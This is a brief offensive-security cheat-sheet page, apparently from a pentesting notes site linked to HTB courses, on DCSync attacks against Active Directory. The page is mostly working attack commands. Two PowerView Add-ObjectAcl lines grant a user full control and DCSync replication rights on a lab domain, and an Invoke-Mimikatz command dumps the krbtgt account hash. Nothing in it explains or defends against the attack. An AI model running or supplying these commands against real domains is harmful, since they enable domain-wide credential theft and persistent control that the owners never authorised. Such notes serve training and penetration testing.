AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA

2️⃣DCsync

Add full-control rights

Add-ObjectAcl -TargetDistinguishedName β€˜DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose

Add rights for DCsync

Add-ObjectAcl -TargetDistinguishedName β€˜DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose

Execute DCSync and dump krbtgt

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
PreviousAdminSDHolderNextWMI

Last updated